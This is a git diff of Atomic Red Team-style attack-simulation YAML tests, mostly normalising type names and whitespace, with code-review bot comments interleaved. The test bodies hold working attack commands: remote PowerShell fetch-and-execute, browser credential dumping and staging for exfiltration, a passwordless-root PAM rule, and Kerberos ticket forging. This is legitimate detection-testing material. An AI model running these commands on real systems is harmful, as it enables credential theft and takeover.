+ prereq_command: | + which kind + get_prereq_command: | + curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 + chmod +x ./kind + mv kind /usr/bin/kind + + - description: Verify kind-atomic-cluster is created + prereq_command: | + sudo kind get clusters + get_prereq_command: | + sudo kind create cluster --name atomic-cluster + + - description: Verify kubectl is in path + prereq_command: | + which kubectl + get_prereq_command: | + curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" + chmod +x ./kubectl + mv kubectl /usr/bin/kubectl + + - description: Verify atomic-pod is running. + prereq_command: | + kubectl --context kind-atomic-cluster get pods |grep atomic-pod + get_prereq_command: | + kubectl --context kind-atomic-cluster run atomic-pod --image=alpine --command -- sleep infinity + + executor: + command: | + kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token + name: sh + cleanup_command: | + kubectl --context kind-atomic-cluster delete pod atomic-pod diff --git a/atomics/T1552/T1552.yaml b/atomics/T1552/T1552.yaml index 22f403b6..afe1bfbe 100644 --- a/atomics/T1552/T1552.yaml +++ b/atomics/T1552/T1552.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: stratus_path: description: Path of stratus binary - type: Path + type: path default: $PathToAtomicsFolder/T1552/src aws_region: description: AWS region to detonate - type: String + type: string default: us-west-2 dependency_executor_name: sh dependencies: 
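Review bot: The docker `get_prereq_command` on the new side tests `[ "" == ... ]` while the test declares `dependency_executor_name: sh`, and `==` is not a POSIX `test` operator, so on dash-based systems the check aborts with an "unexpected operator" error instead of reporting whether Docker is installed; `if [ -z "$(command -v docker)" ]; then` is the portable form. The kind and kubectl prerequisites `curl` a binary and `mv` it into `/usr/bin` without checking a checksum or signature, and the kubectl one follows `stable.txt`, so the installed tool is neither verified nor reproducible; pin the version and verify the published checksum before moving the file into place. `sudo kind create cluster` writes the kubeconfig for root, while the later `kubectl --context kind-atomic-cluster` calls run without sudo and presumably read the invoking user's kubeconfig, so they may not find the context — worth confirming on a clean host. These lines are identical in content on the removed and added sides, so the hunk appears to re-emit the whole file (likely a line-ending normalisation) and the points predate this commit.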
@@ -33,11 +33,11 @@ atomic_tests:
 tar -xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/
 fi
 - description: |
- Check if ~/.aws/credentials file has a default stanza is configured
+ Check if ~/.aws/credentials file has a default stanza is configured
 prereq_command: |
- cat ~/.aws/credentials | grep "default"
+ cat ~/.aws/credentials | grep "default"
 get_prereq_command: |
- echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+ echo Please install the aws-cli and configure your AWS defult profile using: aws configure
 executor:
 command: |
 export AWS_REGION=#{aws_region}
@@ -48,10 +48,10 @@ atomic_tests:
 ./stratus detonate aws.credential-access.ec2-get-password-data --force
 cleanup_command: |
 export AWS_REGION=#{aws_region}
-
+
 echo "Cleanup detonation"
 cd #{stratus_path}
 ./stratus cleanup --all
 rm -rf stratus*
 name: sh
- elevation_required: false
\ No newline at end of file
+ elevation_required: false
diff --git a/atomics/T1553.001/T1553.001.yaml b/atomics/T1553.001/T1553.001.yaml
index eaf74747..5ee7e691 100644
--- a/atomics/T1553.001/T1553.001.yaml
+++ b/atomics/T1553.001/T1553.001.yaml
@@ -10,7 +10,7 @@ atomic_tests:
 input_arguments:
 app_path:
 description: Path to app to be used
- type: Path
+ type: path
 default: myapp.app
 executor:
 command: |
diff --git a/atomics/T1553.004/T1553.004.yaml b/atomics/T1553.004/T1553.004.yaml
index c900bf4f..32757aac 100644
--- a/atomics/T1553.004/T1553.004.yaml
+++ b/atomics/T1553.004/T1553.004.yaml
@@ -10,11 +10,11 @@ atomic_tests:
 input_arguments:
 cert_filename:
 description: Path of the CA certificate we create
- type: Path
+ type: path
 default: rootCA.crt
 key_filename:
 description: Key we create that is used to create the CA certificate
- type: Path
+ type: path
 default: rootCA.key
 executor:
 command: |
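Review bot: `+ echo Please install the aws-cli and configure your AWS defult profile using: aws configure` in the T1552.yaml `@@ -33,11` hunk re-emits the typo "defult" in the user-facing message; it should read `default`. The `+ cat ~/.aws/credentials | grep "default"` line above it succeeds if the word appears anywhere in the file (a profile named `default-old`, a comment), which does not prove that the `[default]` stanza the description asks for exists; `grep -q '^\[default\]' ~/.aws/credentials` checks the stanza header itself and needs no `cat`. The description line `Check if ~/.aws/credentials file has a default stanza is configured` also reads awkwardly; `Check that ~/.aws/credentials has a [default] profile stanza` says the same thing. The enclosing `dependencies:` list starts before this hunk.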
@@ -36,11 +36,11 @@ atomic_tests: input_arguments: cert_filename: description: CA file name - type: Path + type: path default: rootCA.crt key_filename: description: Key we create that is used to create the CA certificate - type: Path + type: path default: rootCA.key dependency_executor_name: sh dependencies: @@ -66,11 +66,11 @@ atomic_tests: input_arguments: cert_filename: description: CA file name - type: Path + type: path default: rootCA.crt key_filename: description: Key we create that is used to create the CA certificate - type: Path + type: path default: rootCA.key dependency_executor_name: sh dependencies: @@ -95,7 +95,7 @@ atomic_tests: input_arguments: pfx_path: description: Path of the certificate - type: Path + type: path default: rootCA.cer dependency_executor_name: powershell dependencies: @@ -129,7 +129,7 @@ atomic_tests: input_arguments: pfx_path: description: Path of the certificate - type: Path + type: path default: $env:Temp\rootCA2.cer dependency_executor_name: powershell dependencies: @@ -162,8 +162,8 @@ atomic_tests: - windows executor: command: | - IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) + IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) cleanup_command: | - Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item + Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item name: powershell - elevation_required: true \ No newline at end of file + elevation_required: true diff --git a/atomics/T1553.005/T1553.005.yaml b/atomics/T1553.005/T1553.005.yaml index aa5b5612..44c5ffc4 100644 --- a/atomics/T1553.005/T1553.005.yaml +++ b/atomics/T1553.005/T1553.005.yaml 
@@ -10,7 +10,7 @@ atomic_tests: input_arguments: path_of_iso: description: Path to ISO file - type: Path + type: path default: PathToAtomicsFolder\T1553.005\bin\T1553.005.iso dependency_executor_name: powershell dependencies: @@ -38,7 +38,7 @@ atomic_tests: input_arguments: path_of_iso: description: Path to ISO file - type: Path + type: path default: PathToAtomicsFolder\T1553.005\bin\FeelTheBurn.iso dependency_executor_name: powershell dependencies: @@ -68,11 +68,11 @@ atomic_tests: input_arguments: file_to_download: description: File that will be downloaded to test against. - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/README.md file_path: description: File to have the Zone.Identifier removed. - type: String + type: string default: '$env:tmp\ReadMe.md' dependency_executor_name: powershell dependencies: @@ -97,7 +97,7 @@ atomic_tests: input_arguments: path_of_iso: description: Path to ISO file - type: Path + type: path default: PathToAtomicsFolder\T1553.005\bin\AllTheThings.iso dependency_executor_name: powershell dependencies: @@ -117,4 +117,4 @@ atomic_tests: $instance.Document.Application.ShellExecute($driveLetter+":\document.lnk","",$driveLetter+":\",$null,0) cleanup_command: | Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null - name: powershell \ No newline at end of file + name: powershell diff --git a/atomics/T1555.001/T1555.001.yaml b/atomics/T1555.001/T1555.001.yaml index 2e72abd8..749afa1a 100644 --- a/atomics/T1555.001/T1555.001.yaml +++ b/atomics/T1555.001/T1555.001.yaml @@ -20,7 +20,7 @@ atomic_tests: input_arguments: cert_export: description: Specify the path of the certificates to export. - type: Path + type: path default: /tmp/certs.pem executor: command: | diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml index 547d3c31..3e22b4c3 100644 --- a/atomics/T1555.003/T1555.003.yaml +++ b/atomics/T1555.003/T1555.003.yaml 
@@ -14,7 +14,7 @@ atomic_tests: input_arguments: file_path: description: File path for modified Sysinternals - type: String + type: string default: $env:TEMP dependency_executor_name: powershell dependencies: @@ -45,7 +45,7 @@ atomic_tests: input_arguments: search_string: description: String to search Safari cookies to find. - type: String + type: string default: coinbase executor: command: | @@ -58,11 +58,11 @@ atomic_tests: The following Atomic test utilizes [LaZagne](https://github.com/AlessandroZ/LaZagne) to extract passwords from browsers on the Windows operating system. LaZagne is an open source application used to retrieve passwords stored on a local computer. supported_platforms: - - windows + - windows input_arguments: lazagne_path: description: Path to LaZagne - type: Path + type: path default: PathToAtomicsFolder\T1555.003\bin\LaZagne.exe dependency_executor_name: powershell dependencies: @@ -83,13 +83,13 @@ atomic_tests: description: | Simulates an adversary accessing encrypted credentials from Google Chrome Login database. supported_platforms: - - windows + - windows dependency_executor_name: powershell dependencies: - description: | Chrome must be installed prereq_command: 'if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}' - get_prereq_command: | + get_prereq_command: | $installer = "$env:temp\ChromeStandaloneSetup64.msi" Invoke-WebRequest -OutFile $env:temp\ChromeStandaloneSetup64.msi https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi msiexec /i $installer /qn 
@@ -108,13 +108,13 @@ atomic_tests: description: | Simulates an adversary accessing encrypted credentials from Opera web browser's login database. supported_platforms: - - windows + - windows dependency_executor_name: powershell dependencies: - description: | Opera must be installed - prereq_command: 'if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe") -Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1}' - get_prereq_command: | + prereq_command: 'if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe") -Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1}' + get_prereq_command: | $installer = "$env:temp\OperaStandaloneInstaller.exe" Invoke-WebRequest -OutFile $env:temp\OperaStandaloneInstaller.exe https://get.geo.opera.com/pub/opera/desktop/82.0.4227.43/win/Opera_82.0.4227.43_Setup.exe Start-Process $installer -ArgumentList '/install /silent /launchopera=1 /setdefaultbrowser=0' @@ -122,8 +122,8 @@ atomic_tests: Stop-Process -Name "opera" - description: | Opera login data file must exist - prereq_command: 'if (Test-Path "$env:APPDATA\Opera Software\Opera Stable\Login Data") {exit 0} else {exit 1}' - get_prereq_command: | + prereq_command: 'if (Test-Path "$env:APPDATA\Opera Software\Opera Stable\Login Data") {exit 0} else {exit 1}' + get_prereq_command: | New-Item -Path "$env:APPDATA\Opera Software\Opera Stable\Login Data" -ItemType File executor: name: powershell 
@@ -137,12 +137,12 @@ atomic_tests: Simulates an adversary accessing encrypted credentials from firefox web browser's login database. more info in https://support.mozilla.org/en-US/kb/profiles-where-firefox-stores-user-data supported_platforms: - - windows + - windows dependency_executor_name: powershell dependencies: - description: | Firefox must be installed - prereq_command: 'if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1}' + prereq_command: 'if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe") -Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit 0} else {exit 1}' get_prereq_command: | if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-US"}else {$url="https://download.mozilla.org/?product=firefox-latest-ssl&os=win&lang=en-US"} $installer = "$env:temp\firefoxsetup.exe" @@ -150,8 +150,8 @@ atomic_tests: Start-Process $installer -ArgumentList '/S' -Wait - description: | Firefox login data file must exist - prereq_command: 'if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit 0} else {exit 1}' - get_prereq_command: | + prereq_command: 'if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit 0} else {exit 1}' + get_prereq_command: | if ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {$firefox="C:\Program Files\Mozilla Firefox\firefox.exe"}else {$firefox="C:\Program Files (x86)\Mozilla Firefox\firefox.exe"} Start-Process $firefox -ArgumentList '-CreateProfile Atomic' -Wait Start-Process $firefox -NoNewWindow 
@@ -169,18 +169,18 @@ atomic_tests: Simulates an adversary accessing encrypted credentials from Edge web browser's login database. more info in https://www.forensicfocus.com/articles/chromium-based-microsoft-edge-from-a-forensic-point-of-view/ supported_platforms: - - windows + - windows dependency_executor_name: powershell dependencies: - description: | Edge must be installed - prereq_command: 'if (Test-Path "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe") {exit 0} else {exit 1}' + prereq_command: 'if (Test-Path "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe") {exit 0} else {exit 1}' get_prereq_command: | "Installation is not implemented as Edge is a part of windows" - description: | Edge login data file must exist - prereq_command: 'if (Test-Path "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default") {exit 0} else {exit 1}' - get_prereq_command: | + prereq_command: 'if (Test-Path "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default") {exit 0} else {exit 1}' + get_prereq_command: | $edge="C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" Start-Process $edge Start-Sleep -s 20 
@@ -197,23 +197,23 @@ atomic_tests: Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords. Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen. supported_platforms: - - windows + - windows input_arguments: Firepwd_Path: description: Filepath for Firepwd.py - type: String + type: string default: $env:temp\Firepwd.py Out_Filepath: description: Filepath to output results to - type: String + type: string default: $env:temp\T1555.003Test8.txt VS_CMD_Path: description: Filepath to Visual Studio Build Tools Command prompt - type: String + type: string default: C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\VC\Auxiliary\Build\vcvars64.bat Python_Path: description: Filepath to python - type: String + type: string default: C:\Program Files\Python310\python.exe dependency_executor_name: powershell dependencies: @@ -277,11 +277,11 @@ atomic_tests: executor: name: powershell command: | - $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" - cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} - cat #{Out_Filepath} + $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" + cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} + cat #{Out_Filepath} cleanup_command: | - Remove-Item -Path "#{Out_Filepath}" -erroraction silentlycontinue + Remove-Item -Path "#{Out_Filepath}" -erroraction silentlycontinue - name: LaZagne.py - Dump Credentials from Firefox Browser auto_generated_guid: 87e88698-621b-4c45-8a89-4eaebdeaabb1 description: Credential Dump Ubuntu 20.04.4 LTS Focal Fossa Firefox Browser, Reference https://github.com/AlessandroZ/LaZagne 
@@ -290,7 +290,7 @@ atomic_tests: input_arguments: lazagne_path: description: Path you put LaZagne Github with LaZagne.py - type: String + type: string default: /tmp/LaZagne/Linux specific_module: description: You may change the module to "all" for all password that can be found by LaZagne.py @@ -298,7 +298,7 @@ atomic_tests: default: 'browsers -firefox' output_file: description: This is where output for the Firefox passwords goes - type: String + type: string default: /tmp/firefox_password.txt dependency_executor_name: sh dependencies: 
@@ -319,23 +319,23 @@ atomic_tests: This test is designed to search a drive for credential files used by the most common web browsers on Windows (Firefox, Chrome, Opera, and Edge), export the found files to a folder, and zip it, simulating how an adversary might stage sensitive credential files for exfiltration in order to conduct offline password extraction with tools like [firepwd.py](https://github.com/lclevy/firepwd) or [HackBrowserData](https://github.com/moonD4rk/HackBrowserData). supported_platforms: - - windows + - windows executor: - name: powershell + name: powershell command: | - $exfil_folder = "$env:temp\T1555.003" - if (test-path "$exfil_folder") {} else {new-item -path "$env:temp" -Name "T1555.003" -ItemType "directory" -force} - $FirefoxCredsLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" - if (test-path "$FirefoxCredsLocation\key4.db") {copy-item "$FirefoxCredsLocation\key4.db" -destination "$exfil_folder\T1555.003Firefox_key4.db"} else {} - if (test-path "$FirefoxCredsLocation\logins.json") {copy-item "$FirefoxCredsLocation\logins.json" -destination "$exfil_folder\T1555.003Firefox_logins.json"} else {} - if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -destination "$exfil_folder\T1555.003Chrome_Login Data"} else {} - if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account" -destination "$exfil_folder\T1555.003Chrome_Login Data For Account"} else {} - if (test-path "$env:appdata\Opera Software\Opera Stable\Login Data") {copy-item "$env:appdata\Opera Software\Opera Stable\Login Data" -destination "$exfil_folder\T1555.003Opera_Login Data"} else {} - if (test-path "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data") {copy-item "$env:localappdata/Microsoft/Edge/User 
Data/Default/Login Data" -destination "$exfil_folder\T1555.003Edge_Login Data"} else {} - compress-archive -path "$exfil_folder" -destinationpath "$exfil_folder.zip" -force + $exfil_folder = "$env:temp\T1555.003" + if (test-path "$exfil_folder") {} else {new-item -path "$env:temp" -Name "T1555.003" -ItemType "directory" -force} + $FirefoxCredsLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" + if (test-path "$FirefoxCredsLocation\key4.db") {copy-item "$FirefoxCredsLocation\key4.db" -destination "$exfil_folder\T1555.003Firefox_key4.db"} else {} + if (test-path "$FirefoxCredsLocation\logins.json") {copy-item "$FirefoxCredsLocation\logins.json" -destination "$exfil_folder\T1555.003Firefox_logins.json"} else {} + if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data" -destination "$exfil_folder\T1555.003Chrome_Login Data"} else {} + if (test-path "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account") {copy-item "$env:localappdata\Google\Chrome\User Data\Default\Login Data For Account" -destination "$exfil_folder\T1555.003Chrome_Login Data For Account"} else {} + if (test-path "$env:appdata\Opera Software\Opera Stable\Login Data") {copy-item "$env:appdata\Opera Software\Opera Stable\Login Data" -destination "$exfil_folder\T1555.003Opera_Login Data"} else {} + if (test-path "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data") {copy-item "$env:localappdata/Microsoft/Edge/User Data/Default/Login Data" -destination "$exfil_folder\T1555.003Edge_Login Data"} else {} + compress-archive -path "$exfil_folder" -destinationpath "$exfil_folder.zip" -force cleanup_command: | - Remove-Item -Path "$env:temp\T1555.003.zip" -force -erroraction silentlycontinue - Remove-Item -Path "$env:temp\T1555.003\" -force -recurse -erroraction silentlycontinue + Remove-Item -Path "$env:temp\T1555.003.zip" -force -erroraction 
silentlycontinue + Remove-Item -Path "$env:temp\T1555.003\" -force -recurse -erroraction silentlycontinue - name: WinPwn - BrowserPwn auto_generated_guid: 764ea176-fb71-494c-90ea-72e9d85dce76 description: Collect Browser credentials as well as the history via winpwn browserpwn function of WinPwn. @@ -360,7 +360,7 @@ atomic_tests: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') kittenz -consoleoutput -noninteractive name: powershell -- name: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials +- name: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials auto_generated_guid: e5e3d639-6ea8-4408-9ecd-d5a286268ca0 description: PowerSharpPack - Sharpweb searching for Browser Credentials technique via function of WinPwn supported_platforms: @@ -395,7 +395,7 @@ atomic_tests: input_arguments: webbrowserpassview_path: description: 'Path to the WebBrowserPassView executable ' - type: String + type: string default: PathToAtomicsFolder\T1555.003\bin\WebBrowserPassView.exe dependency_executor_name: powershell dependencies: @@ -411,7 +411,7 @@ atomic_tests: Start-Sleep -Second 4 Stop-Process -Name "WebBrowserPassView" name: powershell - elevation_required: true + elevation_required: true - name: BrowserStealer (Chrome / Firefox / Microsoft Edge) auto_generated_guid: 6f2c5c87-a4d5-4898-9bd1-47a55ecaf1dd description: | diff --git a/atomics/T1556.002/T1556.002.yaml b/atomics/T1556.002/T1556.002.yaml index 3e100865..7c18d57b 100644 --- a/atomics/T1556.002/T1556.002.yaml +++ b/atomics/T1556.002/T1556.002.yaml @@ -14,11 +14,11 @@ atomic_tests: input_arguments: dll_path: description: Path to DLL to be installed and registered - type: Path + type: path default: PathToAtomicsFolder\T1556.002\bin dll_name: description: Name of the Password Filter - type: String + type: string default: AtomicRedTeamPWFilter.dll dependency_executor_name: powershell dependencies: 
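Review bot: `+ if (test-path "$exfil_folder") {} else {new-item -path "$env:temp" -Name "T1555.003" -ItemType "directory" -force}` in the re-emitted executor command of the `@@ -319,23` hunk expresses a negated condition through an empty then-branch, and each of the six `copy-item` lines ends in a dead `else {}`; `if (-not (Test-Path $exfil_folder)) { New-Item -Path $env:temp -Name "T1555.003" -ItemType Directory -Force }` and dropping the empty `else {}` blocks say the same thing more plainly. The Edge line also mixes `/` and `\` separators in one path, which Windows accepts but which stands out next to the other five. The command block is unchanged in content between the removed and added sides, so the hunk presumably only normalises whitespace or line endings and the point predates this commit.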
@@ -41,4 +41,4 @@ atomic_tests: reg.exe import PathToAtomicsFolder\T1556.002\lsa_backup.reg remove-item C:\Windows\System32\#{dll_name} name: powershell - elevation_required: true \ No newline at end of file + elevation_required: true diff --git a/atomics/T1556.003/T1556.003.yaml b/atomics/T1556.003/T1556.003.yaml index eb9f989b..19dcfc37 100644 --- a/atomics/T1556.003/T1556.003.yaml +++ b/atomics/T1556.003/T1556.003.yaml @@ -5,22 +5,22 @@ atomic_tests: auto_generated_guid: 4b9dde80-ae22-44b1-a82a-644bf009eb9c description: | Inserts a rule into a PAM config and then tests it. - + Upon successful execution, this test will insert a rule that allows every user to su to root without a password. supported_platforms: - linux input_arguments: path_to_pam_conf: description: PAM config file to modify. - type: String + type: string default: /etc/pam.d/su-l pam_rule: description: Rule to add to the PAM config. - type: String + type: string default: auth sufficient pam_succeed_if.so uid >= 0 index: description: Index where the rule is inserted. - type: Integer + type: integer default: 1 executor: name: sh @@ -40,23 +40,23 @@ atomic_tests: input_arguments: path_to_pam_conf: description: PAM config file to modify. - type: String + type: string default: /etc/pam.d/su-l pam_rule: description: Rule to add to the PAM config. - type: String + type: string default: auth sufficient /tmp/pam_evil.so index: description: Index where the rule is inserted. - type: Integer + type: integer default: 1 path_to_pam_module_source: description: Path to PAM module source code. - type: Path + type: path default: PathToAtomicsFolder/T1556.003/src/pam_evil.c path_to_pam_module: description: Path to PAM module object - type: Path + type: path default: /tmp/pam_evil.so dependencies: - description: | diff --git a/atomics/T1558.001/T1558.001.yaml b/atomics/T1558.001/T1558.001.yaml index a6e85c1d..3740e47f 100644 --- a/atomics/T1558.001/T1558.001.yaml +++ b/atomics/T1558.001/T1558.001.yaml 
@@ -8,27 +8,27 @@ atomic_tests: This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769). The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session. supported_platforms: - - windows + - windows input_arguments: domain_sid: description: SID of the targeted domain, if you keep default it will automatically get the current domain SID - type: String + type: string default: S-1-5-21-DEFAULT domain: description: Targeted Active Directory domain FQDN - type: String + type: string default: '%userdnsdomain%' account: description: Account to impersonate - type: String + type: string default: goldenticketfakeuser krbtgt_aes256_key: description: Krbtgt AES256 key (you will need to set to match your krbtgt key for your domain) - type: String + type: string default: b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 mimikatz_path: description: Mimikatz windows executable - type: Path + type: path default: '$env:TEMP\mimikatz\x64\mimikatz.exe' dependency_executor_name: powershell dependencies: @@ -82,10 +82,10 @@ atomic_tests: echo End of Golden Ticket attack ) "@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\golden.bat - + # run batch file in a new empty session (password and username do not matter) echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null - + # wait until the output file has logged the entire attack do { Start-Sleep 1 # wait a bit so the output file has time to be created 
@@ -108,31 +108,31 @@ atomic_tests: This test crafts a Golden Ticket and then performs an SMB request with it for the SYSVOL share, thus triggering a service ticket request (event ID 4769). The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session. supported_platforms: - - windows + - windows input_arguments: domaincontroller: description: Targeted Active Directory domain FQDN - type: String - default: $ENV:logonserver.TrimStart('\') + "." + "$ENV:userdnsdomain" + type: string + default: $ENV:logonserver.TrimStart('\') + "." + "$ENV:userdnsdomain" account: description: Account to impersonate - type: String + type: string default: $ENV:username krbtgt_aes256_key: description: Krbtgt AES256 key (you will need to set to match your krbtgt key for your domain) - type: String + type: string default: b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 local_folder: description: Local path of Rubeus executable - type: Path + type: path default: $Env:temp local_executable: description: name of the rubeus executable - type: String + type: string default: 'rubeus.exe' rubeus_url: description: URL of Rubeus executable - type: Url + type: url default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe dependency_executor_name: powershell dependencies: 
@@ -151,13 +151,13 @@ atomic_tests: executor: name: powershell elevation_required: false - command: | + command: | Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore - + cmd.exe /c "#{local_folder}\#{local_executable}" golden /aes256:#{krbtgt_aes256_key} /ldap /user:#{account} /dc:$(#{domaincontroller}) /printcmd /outfile:golden $filename = (Get-ChildItem | ? {$_.Name.startswith("golden_")} | Sort-Object -Descending -Property LastWriteTime | select -First 1).Name - + # create batch file with commands to run in a separate "runas /netonly" session # so we don't purge Kerberos ticket from the current Windows session # its output goes to golden.txt temp file, because we cannot capture "runas /netonly" output otherwise @@ -180,10 +180,10 @@ atomic_tests: echo End of Golden Ticket attack ) "@ -Replace "kirbifile", $filename | Out-File -Encoding OEM $env:TEMP\golden.bat - + # run batch file in a new empty session (password and username do not matter) echo "foo" | runas /netonly /user:fake "$env:TEMP\golden.bat" | Out-Null - + # wait until the output file has logged the entire attack do { Start-Sleep 1 # wait a bit so the output file has time to be created diff --git a/atomics/T1558.002/T1558.002.yaml b/atomics/T1558.002/T1558.002.yaml index b36224d0..a552f63d 100644 --- a/atomics/T1558.002/T1558.002.yaml +++ b/atomics/T1558.002/T1558.002.yaml 
@@ -7,31 +7,31 @@ atomic_tests: Once the hash of service account is retrieved it is possible to forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. The generated ticket is injected in a new empty Windows session and discarded after, so it does not pollute the current Windows session. supported_platforms: - - windows + - windows input_arguments: domain_sid: description: SID of the targeted domain, if you keep default it will automatically get the current domain SID - type: String + type: string default: S-1-5-21-DEFAULT domain: description: Targeted Active Directory domain FQDN - type: String + type: string default: '%userdnsdomain%' account: description: Account to impersonate - type: String + type: string default: silverticketfakeuser target: description: System you want to target (Default will be logon server) - type: String + type: string default: '%logonserver:\\=%' service_aes256_key: description: AES256 key (you will need to set to match your service key for your target) - type: String + type: string default: b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9 mimikatz_path: description: Mimikatz windows executable - type: Path + type: path default: '$env:TEMP\mimikatz\x64\mimikatz.exe' dependency_executor_name: powershell dependencies: @@ -85,10 +85,10 @@ atomic_tests: echo End of Silver Ticket attack ) "@ -Replace "DOMAIN_SID", $domain_sid | Out-File -Encoding OEM $env:TEMP\silver.bat - + # run batch file in a new empty session (password and username do not matter) echo "foo" | runas /netonly /user:fake "$env:TEMP\silver.bat" | Out-Null - + # wait until the output file has logged the entire attack do { Start-Sleep 1 # wait a bit so the output file has time to be created diff --git a/atomics/T1558.003/T1558.003.yaml b/atomics/T1558.003/T1558.003.yaml index 6e12879a..3b9f1777 100644 --- a/atomics/T1558.003/T1558.003.yaml +++ b/atomics/T1558.003/T1558.003.yaml 
@@ -36,24 +36,24 @@ atomic_tests: input_arguments: local_folder: description: Local path of Rubeus executable - type: Path + type: path default: $Env:temp local_executable: description: name of the rubeus executable - type: String + type: string default: 'rubeus.exe' out_file: description: file where command results are stored - type: String + type: string default: rubeus_output.txt rubeus_url: description: URL of Rubeus executable - type: Url + type: url default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe flags: description: command flags you would like to run (optional and blank by default) - type: String - default: null + type: string + default: dependency_executor_name: powershell dependencies: - description: | @@ -87,7 +87,7 @@ atomic_tests: input_arguments: domain_name: description: The Domain Name to lookup against - type: String + type: string default: "%USERDNSDOMAIN%" dependency_executor_name: powershell dependencies: @@ -134,7 +134,7 @@ atomic_tests: input_arguments: domain_name: description: The Domain Name to lookup against - type: String + type: string default: "%USERDNSDOMAIN%" dependency_executor_name: powershell dependencies: diff --git a/atomics/T1558.004/T1558.004.yaml b/atomics/T1558.004/T1558.004.yaml index 5ab89c58..6d8c2cad 100644 --- a/atomics/T1558.004/T1558.004.yaml +++ b/atomics/T1558.004/T1558.004.yaml 
